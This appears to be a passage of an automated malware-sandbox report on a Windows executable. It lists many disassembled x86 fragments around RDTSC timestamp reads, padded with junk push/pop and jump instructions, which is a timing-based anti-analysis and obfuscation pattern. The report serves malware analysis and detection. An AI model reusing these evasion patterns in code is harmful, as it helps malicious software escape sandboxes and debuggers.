Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9BE8F second address: F9BF50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F36B8D8D088h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+12485898h] 0x0000002a mov dx, di 0x0000002d push eax 0x0000002e jmp 00007F36B8D8D08Ah 0x00000033 mov dword ptr [esp], eax 0x00000036 jmp 00007F36B8D8D097h 0x0000003b lea eax, dword ptr [ebp+12485854h] 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F36B8D8D088h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 00000016h 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b mov edx, dword ptr [ebp+122D2A23h] 0x00000061 nop 0x00000062 jmp 00007F36B8D8D099h 0x00000067 push eax 0x00000068 jnp 00007F36B8D8D09Ah 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F36B8D8D08Ch 0x00000075 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9BF50 second address: F8031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sbb di, 7311h 0x0000000c call dword ptr [ebp+122D2EC5h] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FD78BA second address: FD78C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FD78C0 second address: FD78CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FD7C8A second address: FD7C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FDDFA3 second address: FDDFC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F36B8869BF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FDDFC9 second address: FDDFED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F36B8D8D092h 0x00000011 jnc 00007F36B8D8D086h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FDE4B1 second address: FDE4B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FDDB35 second address: FDDB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F36B8D8D086h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FDDB42 second address: FDDB46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FDDB46 second address: FDDB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F36B8D8D08Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FDE9E1 second address: FDE9EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F36B8869BF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FDE9EB second address: FDE9EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FDE9EF second address: FDE9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FE2AE6 second address: FE2AEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FE2AEC second address: FE2B22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F36B8869BF6h 0x00000009 jo 00007F36B8869BF6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007F36B8869C02h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F36B8869BFCh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FE2B22 second address: FE2B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F36B8D8D099h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FE2B43 second address: FE2B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FEBE9E second address: FEBEA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FEBEA2 second address: FEBEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F36B8869C00h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FEBEBC second address: FEBEC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FEC00A second address: FEC018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F36B8869BF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FEC2F4 second address: FEC2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FEC2FA second address: FEC2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FEC75E second address: FEC764 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FEC764 second address: FEC79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36B8869BFEh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F36B8869C09h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FEC79C second address: FEC7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF1B1C second address: FF1B50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F36B8869C07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F36B8869C05h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF1B50 second address: FF1B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF1F59 second address: FF1F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F36B8869BFFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jc 00007F36B8869BF6h 0x00000016 pop eax 0x00000017 jmp 00007F36B8869C02h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF2431 second address: FF2437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF2591 second address: FF2595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF2595 second address: FF25BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F36B8D8D09Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF25BB second address: FF25BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF25BF second address: FF25C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF25C5 second address: FF25D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF25D1 second address: FF25D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF5C5B second address: FF5C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF5DD3 second address: FF5DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF5DD7 second address: FF5DFE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F36B8869C09h 0x0000000c jo 00007F36B8869BF6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF5DFE second address: FF5E16 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F36B8D8D093h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F36B8D8D08Bh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF5E16 second address: FF5E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F36B8869BF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FF6252 second address: FF6262 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F36B8D8D086h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFBB62 second address: FFBB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFBB66 second address: FFBB72 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F36B8D8D086h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFBB72 second address: FFBB8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8869C02h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFBB8A second address: FFBB90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFBB90 second address: FFBBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F36B8869BFFh 0x00000010 jnl 00007F36B8869BF6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFBBB2 second address: FFBBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFBBBD second address: FFBBCC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jng 00007F36B8869BF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFBD1A second address: FFBD1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFBD1E second address: FFBD24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFC4A4 second address: FFC4B0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F36B8D8D086h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFCA7D second address: FFCA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFCA82 second address: FFCA8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFCA8A second address: FFCA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFCD65 second address: FFCD84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F36B8D8D086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F36B8D8D093h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFD33C second address: FFD340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFD340 second address: FFD361 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F36B8D8D08Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f jbe 00007F36B8D8D08Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFD922 second address: FFD92C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F36B8869BF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFD92C second address: FFD935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFD935 second address: FFD93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFD93F second address: FFD94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FFD94F second address: FFD95B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F36B8869BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10035E8 second address: 10035F2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F36B8D8D08Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 1007062 second address: 100707C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F36B8869C01h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100707C second address: 10070A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8D8D099h 0x00000009 jmp 00007F36B8D8D08Ch 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10071D4 second address: 10071E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 10071E7 second address: 10071F1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F36B8D8D086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100FF19 second address: 100FF50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F36B8869C08h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100FF50 second address: 100FF77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F36B8D8D086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F36B8D8D099h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100FF77 second address: 100FF7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100FF7B second address: 100FF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F36B8D8D086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100FF8D second address: 100FF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100E1FE second address: 100E202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100E78B second address: 100E7A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F36B8869BF6h 0x00000009 jno 00007F36B8869BF6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jc 00007F36B8869C0Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100E7A7 second address: 100E7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100E7AD second address: 100E7B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100EB89 second address: 100EB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100EB91 second address: 100EBB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F36B8869C04h 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100ED50 second address: 100ED65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jp 00007F36B8D8D08Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100ED65 second address: 100ED6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100ED6B second address: 100ED6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100EEBE second address: 100EECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F36B8869BF6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100EECF second address: 100EED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100EED3 second address: 100EEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100EEDB second address: 100EEEB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 jg 00007F36B8D8D08Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100F68A second address: 100F6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8869C08h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100F6A6 second address: 100F6AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: 100DBA1 second address: 100DBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F36B8869C04h 0x0000000d rdtsc
